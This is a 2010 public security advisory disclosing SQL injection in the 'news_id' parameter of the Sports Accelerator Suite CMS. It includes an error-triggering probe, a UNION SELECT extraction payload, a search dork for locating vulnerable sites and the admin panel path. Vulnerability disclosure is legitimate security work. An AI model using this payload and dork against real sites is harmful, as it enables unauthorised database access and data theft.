65 lines
No EOL
1.8 KiB
Text
65 lines
No EOL
1.8 KiB
Text
Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability
|
|
|
|
|
|
|
|
Vendor: Athlete Web Services, Inc. / AWS Sports
|
|
Product Web Page: http://www.athletewebservices.com
|
|
|
|
|
|
Summary: Content Management System (PHP+MySQL).
|
|
|
|
|
|
Description: The CMS is vulnerable to an SQL Injection attack when input is
|
|
passed to the "news_id" parameter. The script fails to properly sanitize the
|
|
input before being returned to the user allowing the attacker to compromise
|
|
the entire DB system and view sensitive information.
|
|
|
|
|
|
=============================================================================
|
|
|
|
GET .../show_news.php?news_id=xx%27
|
|
|
|
1064 - You have an error in your SQL syntax. Check the manual that corresponds
|
|
to your MySQL server version for the right syntax to use near '\'' at line xx.
|
|
|
|
=============================================================================
|
|
|
|
|
|
Affected Version: 1.1 and 2.0
|
|
|
|
|
|
Tested On: Microsoft IIS 6.0
|
|
MySQL 4.0.15-log
|
|
PHP 4.3.3
|
|
|
|
|
|
Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
|
|
liquidworm gmail com
|
|
http://www.zeroscience.mk
|
|
|
|
|
|
Vendor Status: [05.06.2010] Vulnerability discovered.
|
|
[09.08.2010] Vendor contacted.
|
|
[13.08.2010] No response from vendor.
|
|
[14.08.2010] Public advisory released.
|
|
|
|
|
|
Zero Science Lab Advisory ID: ZSL-2010-4949
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php
|
|
|
|
|
|
Vector:
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
Dork: "Designed and powered by AWS Sports"
|
|
|
|
Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]
|
|
|
|
Admin: http://vulpage.tld/admin/index.php
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
|
|
|
|
t00t! |